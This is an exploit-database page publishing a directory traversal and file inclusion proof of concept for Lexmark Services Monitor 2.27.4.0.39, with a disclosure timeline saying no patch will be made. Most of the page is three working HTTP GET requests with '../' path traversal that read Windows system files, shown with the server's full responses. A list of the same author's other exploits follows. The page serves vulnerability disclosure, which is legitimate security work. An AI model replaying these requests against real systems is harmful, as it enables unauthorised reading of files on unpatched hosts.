Search for hundreds of thousands of exploits

"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"

Author

Exploit author

"Kevin Randall"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-11-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A​
# Date: 2019​-11-15
# Exploit Author: Kevin Randall​
# Vendor Homepage: https://www.lexmark.com/en_us.html​
# Software Link: https://www.lexmark.com/en_us.html​
# Version: 2.27.4.0.39 (Latest Version)​
# Tested on: Windows Server 2012​
# CVE : N/A
​
​
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
​
Timeline:​
Discovered on: 9/24/2019​
Vendor Notified: 9/24/2019​
Vendor Confirmed Receipt of Vulnerability: 9/24/2019​
Follow up with Vendor: 9/25/2019​
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​
Vendor Confirmed Vulnerability is Valid: 9/26/2019​
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​
Vendor Confirmed Signoff to Disclose: 9/27/2019​
Final Email Sent: 9/27/2019​
Public Disclosure: 11/15/2019​
​
PoC:​
​
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 848536​
​
​
.​
.​
.​
.[.P.e.r.f.l.i.b.].​
.​
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​
.​
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​
.​
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​
.​
.L.a.s.t. .H.e.l.p.=.5.0.4.1.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​
​
​
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 38710​
​
..[.S.t.r.i.n.g.s.].​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​
​
​
​
​
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 17463​
​
# Copyright (c) 1993-2004 Microsoft Corp.​
#​
# This file contains port numbers for well-known services defined by IANA​
#​
# Format:​
#​
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]​
#​
​
echo                7/tcp​
echo                7/udp​
discard             9/tcp    sink null​
discard             9/udp    sink null​
systat             11/tcp    users                  #Active users​
systat             11/udp    users                  #Active users​
daytime            13/tcp​
daytime            13/udp​
qotd               17/tcp    quote                  #Quote of the day​
qotd               17/udp    quote                  #Quote of the day​
chargen            19/tcp    ttytst source          #Character generator​
chargen            19/udp    ttytst source          #Character generator​
ftp-data           20/tcp                           #FTP, data​
ftp                21/tcp                           #FTP. control​
ssh                22/tcp                           #SSH Remote Login Protocol​
telnet             23/tcp​
smtp               25/tcp    mail                   #Simple Mail Transfer Protocol​
time               37/tcp    timserver
Release DateTitleTypePlatformAuthor
2020-03-11"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)"remotewindows"Kevin Randall"
2020-03-11"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)"remotewindows"Kevin Randall"
2019-12-17"Netgear R6400 - Remote Code Execution"webappshardware"Kevin Randall"
2019-11-18"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"webappshardware"Kevin Randall"
2019-06-04"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)"localwindows"Kevin Randall"
2019-04-30"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow"remotewindows"Kevin Randall"
2019-04-30"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow"remotewindows"Kevin Randall"
2019-03-26"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion"webappswindows"Kevin Randall"
2019-03-13"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal"doswindows"Kevin Randall"
2019-03-13"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal"doswindows"Kevin Randall"
2018-08-30"DLink DIR-601 - Credential Disclosure"webappshardware"Kevin Randall"
2018-04-02"DLink DIR-601 - Admin Password Disclosure"webappshardware"Kevin Randall"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47663/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.